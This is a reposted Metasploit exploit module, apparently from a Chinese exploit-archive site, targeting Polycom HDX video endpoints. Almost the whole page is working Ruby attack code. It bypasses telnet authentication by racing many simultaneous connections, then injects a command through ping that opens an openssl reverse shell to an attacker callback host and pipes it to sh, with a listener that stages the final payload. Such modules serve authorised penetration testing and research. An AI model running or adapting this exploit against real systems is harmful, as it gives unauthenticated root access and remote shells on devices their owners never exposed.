首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Polycom Command Shell Authorization Bypass
来源:metasploit.com 作者:PaulHaas 发布时间:2017-10-23  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'            => 'Polycom Command Shell Authorization Bypass',
        'Alias'           => 'polycom_hdx_auth_bypass',
        'Author'          =>
          [
            'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module
            'h00die <mike@shorebreaksecurity.com>',         # submission/cleanup
          ],
        'DisclosureDate'  => 'Jan 18 2013',
        'Description'     => %q(
          The login component of the Polycom Command Shell on Polycom HDX
          video endpoints, running software versions 3.0.5 and earlier,
          is vulnerable to an authorization bypass when simultaneous
          connections are made to the service, allowing remote network
          attackers to gain access to a sandboxed telnet prompt without
          authentication. Versions prior to 3.0.4 contain OS command
          injection in the ping command which can be used to execute
          arbitrary commands as root.
          ),
        'License'         => MSF_LICENSE,
        'References'      =>
          [
            [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ],
            [ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ],
            [ 'EDB', '24494']
          ],
        'Platform'    => 'unix',
        'Arch'        => ARCH_CMD,
        'Privileged'  => true,
        'Targets'     => [ [ "Universal", {} ] ],
        'Payload'     =>
        {
          'Space'        => 8000,
          'DisableNops'  => true,
          'Compat'       => { 'PayloadType' => 'cmd' }
        },
        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' },
        'DefaultTarget'  => 0
      )
    )

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(23),
        OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
        OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
      ], self.class
    )
    register_advanced_options(
      [
        OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),
        OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])
      ], self.class
    )
  end

  def check
    connect
    sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + "\n")
    Rex.sleep(1)
    res = sock.get_once
    disconnect

    if !res && !res.empty?
      return Exploit::CheckCode::Safe
    end

    if res =~ /Welcome to ViewStation/
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    # Keep track of results (successful connections)
    results = []

    # Random string for password
    password = Rex::Text.rand_text_alpha(rand(5) + 1)

    # Threaded login checker
    max_threads = datastore['THREADS']
    cur_threads = []

    # Try up to 100 times just to be sure
    queue = [*(1..datastore['MAX_CONNECTIONS'])]

    print_status("Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections ")
    until queue.empty?
      while cur_threads.length < max_threads

        # We can stop if we get a valid login
        break unless results.empty?

        # keep track of how many attempts we've made
        item = queue.shift

        # We can stop if we reach max tries
        break unless item

        t = Thread.new(item) do |count|
          sock = connect
          sock.put(password + "\n")
          res = sock.get_once

          until res.empty?
            break unless results.empty?

            # Post-login Polycom banner means success
            if res =~ /Polycom/
              results << sock
              break
            # bind error indicates bypass is working
            elsif res =~ /bind/
              sock.put(password + "\n")
            # Login error means we need to disconnect
            elsif res =~ /failed/
              break
            # To many connections means we need to disconnect
            elsif res =~ /Error/
              break
            end
            res = sock.get_once
          end
        end

        cur_threads << t
      end

      # We can stop if we get a valid login
      break unless results.empty?

      # Add to a list of dead threads if we're finished
      cur_threads.each_index do |ti|
        t = cur_threads[ti]
        unless t.alive?
          cur_threads[ti] = nil
        end
      end

      # Remove any dead threads from the set
      cur_threads.delete(nil)

      Rex.sleep(0.25)
    end

    # Clean up any remaining threads
    cur_threads.each { |sock| sock.kill }

    if !results.empty?
      print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw")
      do_payload(results[0])
    else
      print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
    end
  end

  def do_payload(sock)
    # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
    cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])

    # Start a listener
    start_listener(true)

    # Figure out the port we picked
    cbport = self.service.getsockname[2]

    # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
    cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n"
    sock.put(cmd)

    # Give time for our command to be queued and executed
    1.upto(5) do
      Rex.sleep(1)
      break if session_created?
    end
  end

  def stage_final_payload(cli)
    print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
    cli.put(payload.encoded + "\n")
  end

  def start_listener(ssl = false)
    comm = datastore['ListenerComm']
    if comm == 'local'
      comm = ::Rex::Socket::Comm::Local
    else
      comm = nil
    end

    self.service = Rex::Socket::TcpServer.create(
      'LocalPort' => datastore['CBPORT'],
      'SSL'       => ssl,
      'SSLCert'   => datastore['SSLCert'],
      'Comm'      => comm,
      'Context'   =>
      {
        'Msf'        => framework,
        'MsfExploit' => self
      }
    )

    self.service.on_client_connect_proc = proc { |client|
      stage_final_payload(client)
    }

    # Start the listening service
    self.service.start
  end

  # Shut down any running services
  def cleanup
    super
    if self.service
      print_status("Shutting down payload stager listener...")
      begin
        self.service.deref if self.service.is_a?(Rex::Service)
        if self.service.is_a?(Rex::Socket)
          self.service.close
          self.service.stop
        end
        self.service = nil
      rescue ::Exception
      end
    end
  end

  # Accessor for our TCP payload stager
  attr_accessor :service
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TP-Link WR940N Remote Code Exe
·Unitrends UEB bpserverd Authen
·Hashicorp vagrant-vmware-fusio
·Unitrends UEB 9 HTTP API/Stora
·Check_MK 1.2.8p25 - Informatio
·Ayukov NFTP FTP Client < 2.0 -
·Mozilla Firefox < 55 - Denial
·ArGoSoft Mini Mail Server 1.0.
·Linux Kernel - 'AF_PACKET' Use
·Kaltura < 13.1.0 - Remote Code
·Microsoft Windows - 'nt!NtQuer
·Linux Kernel 4.14.0-rc4+ - 'wa
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved